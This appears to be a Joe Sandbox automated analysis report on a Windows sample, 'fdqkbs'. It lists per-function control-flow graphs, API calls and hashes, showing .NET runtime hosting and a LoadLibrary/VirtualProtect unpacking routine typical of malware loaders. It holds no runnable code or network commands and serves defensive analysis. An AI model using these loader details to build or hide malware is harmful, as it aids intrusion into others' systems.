                                                                                  • String ID: v4.0.30319
                                                                                  • API String ID: 3516860096-3152434051
                                                                                  • Opcode ID: 873238705ce47a69c6e2e929523a932b8a4326f398e40a407d6947fa5b2cd078
                                                                                  • Instruction ID: 0c2c29d2e87145e6a018a0f42715e838ea3eb340154ddaa220d5c303f6f6ea5b
                                                                                  • Opcode Fuzzy Hash: 873238705ce47a69c6e2e929523a932b8a4326f398e40a407d6947fa5b2cd078
                                                                                  • Instruction Fuzzy Hash: B2B12975A012199FCB01CFA4C988EAEBBB9BF88750B14446EE905FB360DB35DD01CB64
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 214 400fae-400fb0 215 400fb2-400fb7 214->215 216 401009-40105a CLRCreateInstance 214->216 215->216 218 40105e-401082 216->218 222 401088-40109b 218->222 223 40109f-4010a3 222->223 224 4010a9-4010ad 223->224 225 4010b2-4010c1 224->225 227 4010c3-4010c5 225->227 228 4010c9-4010d1 225->228 227->228 229 4010d6-4010f0 228->229 232 4010f2-4010f4 229->232 233 4010f8-40110a 229->233 232->233 235 401110-40112e SafeArrayCreate 233->235 236 401134-401171 SafeArrayAccessData call 403120 SafeArrayUnaccessData 235->236 241 401173-401175 236->241 242 401179-401182 236->242 241->242 282 401183 call 8fd01d 242->282 283 401183 call 8fd01c 242->283 243 401189-4011a3 246 4011a5-4011a7 243->246 247 4011ab-4011b1 243->247 246->247 278 4011b2 call 8fd01d 247->278 279 4011b2 call 8fd01c 247->279 248 4011b5-4011c4 250 4011ca-4011d0 248->250 280 4011d1 call 8fd01d 250->280 281 4011d1 call 8fd01c 250->281 251 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 254 401280-401288 251->254 255 401213-40121b 251->255 256 401290-401295 254->256 257 40128a-40128c 254->257 258 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 255->258 259 40121d-40123c SysAllocString SafeArrayPutElement 255->259 260 401297-401299 256->260 261 40129d-4012a2 256->261 257->256 258->254 259->254 262 40123e-401248 259->262 260->261 263 4012b3-4012b5 261->263 264 4012a4-4012ae 261->264 262->258 262->259 265 4012b7-4012b8 SafeArrayDestroy 263->265 266 4012be-4012c0 263->266 264->263 265->266 268 4012c2-4012c3 SafeArrayDestroy 266->268 269 4012c9-4012ce 266->269 268->269 270 4012d0-4012d2 269->270 271 4012d6-4012db 269->271 270->271 272 4012e3-4012e8 271->272 273 4012dd-4012df 271->273 274 4012f0-4012f5 272->274 275 4012ea-4012ec 272->275 273->272 276 4012f7-4012f9 274->276 277 4012fd-401303 274->277 275->274 276->277 278->248 279->248 280->251 281->251 282->243 283->243
                                                                                  APIs
                                                                                  • CLRCreateInstance.MSCOREE(00412D78,00412D38,?), ref: 00401037
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateInstance
                                                                                  • String ID: v4.0.30319
                                                                                  • API String ID: 542301482-3152434051
                                                                                  • Opcode ID: 85fe1cc5f0066b84895c07e484125a00651d0d94523f1ac9f254cc520d16adbb
                                                                                  • Instruction ID: c628a7e1a31fe17d332532bab36448b76cf9220d3634fe75d1a8a10d87e09ff7
                                                                                  • Opcode Fuzzy Hash: 85fe1cc5f0066b84895c07e484125a00651d0d94523f1ac9f254cc520d16adbb
                                                                                  • Instruction Fuzzy Hash: 9BB13B75A012199FCB01CFA4C988DAEBBB9BF88750B14446EE905FB360DB35DD41CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 284 400fd8-400fdf 285 400fe1-400fe7 284->285 286 401044-40104c 284->286 285->286 287 40104e-40105a 286->287 288 40105e-401082 287->288 292 401088-40109b 288->292 293 40109f-4010a3 292->293 294 4010a9-4010ad 293->294 295 4010b2-4010c1 294->295 297 4010c3-4010c5 295->297 298 4010c9-4010d1 295->298 297->298 299 4010d6-4010f0 298->299 302 4010f2-4010f4 299->302 303 4010f8-40110a 299->303 302->303 305 401110-40112e SafeArrayCreate 303->305 306 401134-401171 SafeArrayAccessData call 403120 SafeArrayUnaccessData 305->306 311 401173-401175 306->311 312 401179-401182 306->312 311->312 348 401183 call 8fd01d 312->348 349 401183 call 8fd01c 312->349 313 401189-4011a3 316 4011a5-4011a7 313->316 317 4011ab-4011b1 313->317 316->317 350 4011b2 call 8fd01d 317->350 351 4011b2 call 8fd01c 317->351 318 4011b5-4011c4 320 4011ca-4011d0 318->320 352 4011d1 call 8fd01d 320->352 353 4011d1 call 8fd01c 320->353 321 4011d4-401211 GetCommandLineW CommandLineToArgvW SafeArrayCreateVector 324 401280-401288 321->324 325 401213-40121b 321->325 326 401290-401295 324->326 327 40128a-40128c 324->327 328 40124a-40127a SafeArrayCreateVector SafeArrayPutElement 325->328 329 40121d-40123c SysAllocString SafeArrayPutElement 325->329 330 401297-401299 326->330 331 40129d-4012a2 326->331 327->326 328->324 329->324 332 40123e-401248 329->332 330->331 333 4012b3-4012b5 331->333 334 4012a4-4012ae 331->334 332->328 332->329 335 4012b7-4012b8 SafeArrayDestroy 333->335 336 4012be-4012c0 333->336 334->333 335->336 338 4012c2-4012c3 SafeArrayDestroy 336->338 339 4012c9-4012ce 336->339 338->339 340 4012d0-4012d2 339->340 341 4012d6-4012db 339->341 340->341 342 4012e3-4012e8 341->342 343 4012dd-4012df 341->343 344 4012f0-4012f5 342->344 345 4012ea-4012ec 342->345 343->342 346 4012f7-4012f9 344->346 347 4012fd-401303 344->347 345->344 346->347 348->313 349->313 350->318 351->318 352->321 353->321
                                                                                  APIs
                                                                                  • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 00401121
                                                                                  • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00401139
                                                                                  • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 0040115B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$Data$AccessCreateUnaccess
                                                                                  • String ID: v4.0.30319
                                                                                  • API String ID: 3631458715-3152434051
                                                                                  • Opcode ID: 02245fa6a25c8a7a88b4d047e5ae443a1f903a675161b50fceca8856171a95dd
                                                                                  • Instruction ID: 2316b79ef1876d233a0ca10ce79880e8c0426e1a516b816bc189b1ee0b53c2a9
                                                                                  • Opcode Fuzzy Hash: 02245fa6a25c8a7a88b4d047e5ae443a1f903a675161b50fceca8856171a95dd
                                                                                  • Instruction Fuzzy Hash: E6A14B75A002199FCB11CFA4C888EAEBBB9AF48750B14046DE905FB3A1DB35ED01CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 362 22cb6c0-22cb741 GetCurrentProcess 364 22cb74a-22cb77e GetCurrentThread 362->364 365 22cb743-22cb749 362->365 366 22cb787-22cb7bb GetCurrentProcess 364->366 367 22cb780-22cb786 364->367 365->364 368 22cb7bd-22cb7c3 366->368 369 22cb7c4-22cb7df call 22cbc89 366->369 367->366 368->369 373 22cb7e5-22cb814 GetCurrentThreadId 369->373 374 22cb81d-22cb87f 373->374 375 22cb816-22cb81c 373->375 375->374
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 022CB730
                                                                                  • GetCurrentThread.KERNEL32 ref: 022CB76D
                                                                                  • GetCurrentProcess.KERNEL32 ref: 022CB7AA
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 022CB803
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 2063062207-443218294
                                                                                  • Opcode ID: d125feb8206142147b7e8e79a0803a726c69ce17f8ddb32781dc54dfe58c612c
                                                                                  • Instruction ID: de6f3c8e3d44bbc186aa59f595a8442587f8d703395b005e86ab6b0a2ffe8823
                                                                                  • Opcode Fuzzy Hash: d125feb8206142147b7e8e79a0803a726c69ce17f8ddb32781dc54dfe58c612c
                                                                                  • Instruction Fuzzy Hash: E05156B49042498FDB10CFAAC5887DEBBF1EF48314F24856AE419B7391D7786884CF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 382 22cb6d0-22cb741 GetCurrentProcess 383 22cb74a-22cb77e GetCurrentThread 382->383 384 22cb743-22cb749 382->384 385 22cb787-22cb7bb GetCurrentProcess 383->385 386 22cb780-22cb786 383->386 384->383 387 22cb7bd-22cb7c3 385->387 388 22cb7c4-22cb7df call 22cbc89 385->388 386->385 387->388 392 22cb7e5-22cb814 GetCurrentThreadId 388->392 393 22cb81d-22cb87f 392->393 394 22cb816-22cb81c 392->394 394->393
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 022CB730
                                                                                  • GetCurrentThread.KERNEL32 ref: 022CB76D
                                                                                  • GetCurrentProcess.KERNEL32 ref: 022CB7AA
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 022CB803
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 2063062207-443218294
                                                                                  • Opcode ID: c68dd2bd4b610fd48ef6be52b73724fd4fe4f83edeaf9ce201a1bdb8769dc55f
                                                                                  • Instruction ID: 15335aaa2b29c0bbf7a360c9785e3ab16f980a907db78f2791d227c73bb65b8c
                                                                                  • Opcode Fuzzy Hash: c68dd2bd4b610fd48ef6be52b73724fd4fe4f83edeaf9ce201a1bdb8769dc55f
                                                                                  • Instruction Fuzzy Hash: BD5114B09002498FDB14CFAAD588BDEBBF5EB48314F248569E419B7350D7786884CF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 401 44d450-44d460 402 44d472-44d477 401->402 403 44d479 402->403 404 44d468-44d46d 403->404 405 44d47b 403->405 407 44d46e-44d470 404->407 406 44d480-44d482 405->406 408 44d484-44d489 406->408 409 44d48b-44d48f 406->409 407->402 407->403 408->409 410 44d491 409->410 411 44d49c-44d49f 409->411 412 44d493-44d49a 410->412 413 44d4bb-44d4c0 410->413 414 44d4a1-44d4a6 411->414 415 44d4a8-44d4aa 411->415 412->411 412->413 416 44d4c2-44d4cb 413->416 417 44d4d3-44d4d5 413->417 414->415 415->406 420 44d542-44d545 416->420 421 44d4cd-44d4d1 416->421 418 44d4d7-44d4dc 417->418 419 44d4de 417->419 418->419 423 44d4e0-44d4e3 419->423 424 44d4ac-44d4ae 419->424 422 44d54a-44d54d 420->422 421->419 425 44d54f-44d551 422->425 426 44d4e5-44d4ea 423->426 427 44d4ec 423->427 428 44d4b7-44d4b9 424->428 429 44d4b0-44d4b5 424->429 425->422 430 44d553-44d556 425->430 426->427 427->424 431 44d4ee-44d4f0 427->431 432 44d50d-44d51c 428->432 429->428 430->422 433 44d558-44d574 430->433 434 44d4f2-44d4f7 431->434 435 44d4f9-44d4fd 431->435 436 44d52c-44d539 432->436 437 44d51e-44d525 432->437 433->425 438 44d576 433->438 434->435 435->431 439 44d4ff 435->439 436->436 441 44d53b-44d53d 436->441 437->437 440 44d527 437->440 442 44d57c-44d580 438->442 443 44d501-44d508 439->443 444 44d50a 439->444 440->407 441->407 445 44d5c7-44d5f7 VirtualProtect * 2 442->445 446 44d582-44d598 LoadLibraryA 442->446 443->431 443->444 444->432 448 44d5fb-44d5ff 445->448 447 44d599-44d59e 446->447 447->442 450 44d5a0-44d5a2 447->450 448->448 449 44d601 448->449 451 44d5a4-44d5aa 450->451 452 44d5ab-44d5b8 GetProcAddress 450->452 451->452 453 44d5c1 ExitProcess 452->453 454 44d5ba-44d5bf 452->454 454->447
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 0044D592
                                                                                  • GetProcAddress.KERNEL32(?,00449FF9), ref: 0044D5B0
                                                                                  • ExitProcess.KERNEL32(?,00449FF9), ref: 0044D5C1
                                                                                  • VirtualProtect.KERNELBASE(00400000,00001000,00000004,?,-00000060), ref: 0044D5DE
                                                                                  • VirtualProtect.KERNELBASE(00400000,00001000), ref: 0044D5F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.279499315.0000000000415000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000003.00000002.279499315.0000000000400000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_fdqkbs.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1996367037-0
                                                                                  • Opcode ID: 95c73a4e7170ffa8ba6ab080427cec7b3bfbced1036f2afbc60761617324cedf
                                                                                  • Instruction ID: 0ac0b7c0e5739bb1137c923d74207649c3e0b311112d00f109e80ec51aefa481
                                                                                  • Opcode Fuzzy Hash: 95c73a4e7170ffa8ba6ab080427cec7b3bfbced1036f2afbc60761617324cedf
                                                                                  • Instruction Fuzzy Hash: 32512BB1E447125BE7205DB89CC06B577A4DB52338B18073BC5E2C73C5EBBC680A8769
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 455 22cfbee-22cfc5e 456 22cfc69-22cfc70 455->456 457 22cfc60-22cfc66 455->457 458 22cfc7b-22cfcb3 456->458 459 22cfc72-22cfc78 456->459 457->456 460 22cfcbb-22cfd1a CreateWindowExW 458->460 459->458 461 22cfd1c-22cfd22 460->461 462 22cfd23-22cfd5b 460->462 461->462 466 22cfd5d-22cfd60 462->466 467 22cfd68 462->467 466->467 468 22cfd69 467->468 468->468
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID: LR;v$LR;v
                                                                                  • API String ID: 716092398-2984026332
                                                                                  • Opcode ID: c954caf30cebec69dbcc88bc72ba00e6f3235b9eaf6cdb4c7850e4905d4285d8
                                                                                  • Instruction ID: 2750093f50154a075495d3c3018d870866cce9be6c967c60ba1b64060c94f5a4
                                                                                  • Opcode Fuzzy Hash: c954caf30cebec69dbcc88bc72ba00e6f3235b9eaf6cdb4c7850e4905d4285d8
                                                                                  • Instruction Fuzzy Hash: 1251C1B1D10209DFDB14CF9AD980ADEBBB2FF48310F24822AE819AB214D7749945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 469 22cfbf8-22cfc5e 470 22cfc69-22cfc70 469->470 471 22cfc60-22cfc66 469->471 472 22cfc7b-22cfd1a CreateWindowExW 470->472 473 22cfc72-22cfc78 470->473 471->470 475 22cfd1c-22cfd22 472->475 476 22cfd23-22cfd5b 472->476 473->472 475->476 480 22cfd5d-22cfd60 476->480 481 22cfd68 476->481 480->481 482 22cfd69 481->482 482->482
                                                                                  APIs
                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID: LR;v$LR;v
                                                                                  • API String ID: 716092398-2984026332
                                                                                  • Opcode ID: fdf1918d33eea9096b1dbc528231f8ce968229ec688064b6f7557715fd2f587e
                                                                                  • Instruction ID: 5e1e6b466459b419971ba34bef764e8372e644cf908106831bdf4779d21f84d3
                                                                                  • Opcode Fuzzy Hash: fdf1918d33eea9096b1dbc528231f8ce968229ec688064b6f7557715fd2f587e
                                                                                  • Instruction Fuzzy Hash: 6C41C2B1D10209DFDB14CFDAC980ADEBBB6BF48310F24822AE819AB214D7749945CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 0-443218294
                                                                                  • Opcode ID: 57cc827748cc429c13dda1e0dd190618e74573d3423c2f809dddeefa0036b9eb
                                                                                  • Instruction ID: 930484ffc6624e1aa9b76acbe4c0d4b3cfdbb96f8aa6ba4b0b5b3c90cbb93654
                                                                                  • Opcode Fuzzy Hash: 57cc827748cc429c13dda1e0dd190618e74573d3423c2f809dddeefa0036b9eb
                                                                                  • Instruction Fuzzy Hash: 26226478E0420ECFCB54DB94E4899BEBBB2FF89310F248555D51267395C734E882CB69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 745 22c93e8-22c93fd call 22c8704 748 22c93ff 745->748 749 22c9413-22c9417 745->749 798 22c9405 call 22c9660 748->798 799 22c9405 call 22c9670 748->799 750 22c9419-22c9423 749->750 751 22c942b-22c946c 749->751 750->751 756 22c946e-22c9476 751->756 757 22c9479-22c9487 751->757 752 22c940b-22c940d 752->749 755 22c9548-22c9608 752->755 793 22c960a-22c960d 755->793 794 22c9610-22c963b GetModuleHandleW 755->794 756->757 759 22c9489-22c948e 757->759 760 22c94ab-22c94ad 757->760 761 22c9499 759->761 762 22c9490-22c9497 call 22c8710 759->762 763 22c94b0-22c94b7 760->763 768 22c949b-22c94a9 761->768 762->768 764 22c94b9-22c94c1 763->764 765 22c94c4-22c94cb 763->765 764->765 769 22c94cd-22c94d5 765->769 770 22c94d8-22c94e1 call 22c8720 765->770 768->763 769->770 775 22c94ee-22c94f3 770->775 776 22c94e3-22c94eb 770->776 778 22c94f5-22c94fc 775->778 779 22c9511-22c9515 775->779 776->775 778->779 780 22c94fe-22c950e call 22c8730 call 22c8740 778->780 782 22c951b-22c951e 779->782 780->779 784 22c9520-22c953e 782->784 785 22c9541-22c9547 782->785 784->785 793->794 795 22c963d-22c9643 794->795 796 22c9644-22c9658 794->796 795->796 798->752 799->752
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 4139908857-443218294
                                                                                  • Opcode ID: 1638d5769a369bfd53f1655072ab9ae06999cda3d5b4bf4b956a538ec874e1f0
                                                                                  • Instruction ID: 402f7b45f27d9d5a2a9cc5fb2fad72389fa3aa0ea5bef39d2669b1932d2d8d21
                                                                                  • Opcode Fuzzy Hash: 1638d5769a369bfd53f1655072ab9ae06999cda3d5b4bf4b956a538ec874e1f0
                                                                                  • Instruction Fuzzy Hash: 7A712470A10B058FD724DF6AD4447AABBF5BF88304F208A2ED48AD7A44DB74E945CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 800 50745f5-50745fd 801 50745ff-507467b 800->801 802 5074599-50745c1 800->802 806 5074683-50746c1 CreateActCtxA 801->806 804 50745c3-50745c9 802->804 805 50745ca-50745eb 802->805 804->805 807 50746c3-50746c9 806->807 808 50746ca-5074724 806->808 807->808 816 5074726-5074729 808->816 817 5074733-5074737 808->817 816->817 818 5074739-5074745 817->818 819 5074748 817->819 818->819 821 5074749 819->821 821->821
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 050746B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 2289755597-443218294
                                                                                  • Opcode ID: 4560ad237878ee8698ab10682faaf8db32147f7a0268a2766455ac31ff590994
                                                                                  • Instruction ID: 43a8b15253d7cdef4bab88df8f8aa3911c5cd88680b897601bd2b6c8fa182464
                                                                                  • Opcode Fuzzy Hash: 4560ad237878ee8698ab10682faaf8db32147f7a0268a2766455ac31ff590994
                                                                                  • Instruction Fuzzy Hash: 5351F3B1C00659CFDB20CFAAD8847DEBBF5BF88304F208059D409AB251D7B5A945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 050746B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 2289755597-443218294
                                                                                  • Opcode ID: ce0ea00ea04fbe0b6335f5da50bee3fdacf962f6be428bb3a55373f0463715b1
                                                                                  • Instruction ID: 622829baf36702d343c4074f845f4780f2f2dc4c7630a4d5d948634a6aa399af
                                                                                  • Opcode Fuzzy Hash: ce0ea00ea04fbe0b6335f5da50bee3fdacf962f6be428bb3a55373f0463715b1
                                                                                  • Instruction Fuzzy Hash: 0441E0B1C0065CCBDB24CFAAC844B9EBBF5BF89304F20806AD409BB251D7756945CFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05072531
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallProcWindow
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 2714655100-443218294
                                                                                  • Opcode ID: 4a760a89e91d2fc3bede3ded8e0ae357eb8e4c75a04f12ee66e08300d70100a4
                                                                                  • Instruction ID: 2804aa5ab5799bba99520503201a19417d3f4fce79a05ccb34f7afbe1f2befb4
                                                                                  • Opcode Fuzzy Hash: 4a760a89e91d2fc3bede3ded8e0ae357eb8e4c75a04f12ee66e08300d70100a4
                                                                                  • Instruction Fuzzy Hash: D741F7B9D003098FDB14CF9AD448AAEBBF6FB88314F25C459D519AB321D374A841CBA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0507B957
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.292866903.0000000005070000.00000040.00000800.00020000.00000000.sdmp, Offset: 05070000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_5070000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFromIconResource
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 3668623891-443218294
                                                                                  • Opcode ID: 068d8f5e46823bccc68ef629bc0f42f9db56915c942e552b17cb60be97b31d66
                                                                                  • Instruction ID: 5ddbee76609f7f93757f30a18c71c3e44f8a7ec3ae74445b279c941a69d52ede
                                                                                  • Opcode Fuzzy Hash: 068d8f5e46823bccc68ef629bc0f42f9db56915c942e552b17cb60be97b31d66
                                                                                  • Instruction Fuzzy Hash: EC31CB72904348AFDB118FAAD800ADEBFF9EF09310F04805AE954A7221C3399850DBA0
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 3793708945-443218294
                                                                                  • Opcode ID: a97db087bfaf19e0584a4e8358d1f99525a9f54c4b177ade0abde033b218fc80
                                                                                  • Instruction ID: bca6c5683d706f2df176148645934932fe72f7088e16c63cbf7c12cd68989b94
                                                                                  • Opcode Fuzzy Hash: a97db087bfaf19e0584a4e8358d1f99525a9f54c4b177ade0abde033b218fc80
                                                                                  • Instruction Fuzzy Hash: E421D2B5D00219DFDB00CFAAD580ADEBBF5AF48314F24845AE858B7350D378A945CFA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 3793708945-443218294
                                                                                  • Opcode ID: ddf9afb34853ef34be14f64c978fa67a9842d230ebb7f9fe366370c4b21f7749
                                                                                  • Instruction ID: 8f2ba4c74a1ecac00ab2b4ffbad3eaa920ea21c9ea52bb9b88cbe0a4d41de76a
                                                                                  • Opcode Fuzzy Hash: ddf9afb34853ef34be14f64c978fa67a9842d230ebb7f9fe366370c4b21f7749
                                                                                  • Instruction Fuzzy Hash: 5221E5B59002089FDB10CF9AD484ADEBBF5EB48314F14801AE918B3310D378A944CFA4
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 022C7F5D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.290890793.00000000022C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_22c0000_fdqkbs.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID: LR;v
                                                                                  • API String ID: 2492992576-443218294
                                                                                  • Opcode ID: becd376db111e51dd28bc4e702ae0aa9e7a99d884ca47acee649dad781d235b4
                                                                                  • Instruction ID: 06b4076421bfaa6a64d557def5572e6d8cd78164db4a608d87ec114165e2a3fa
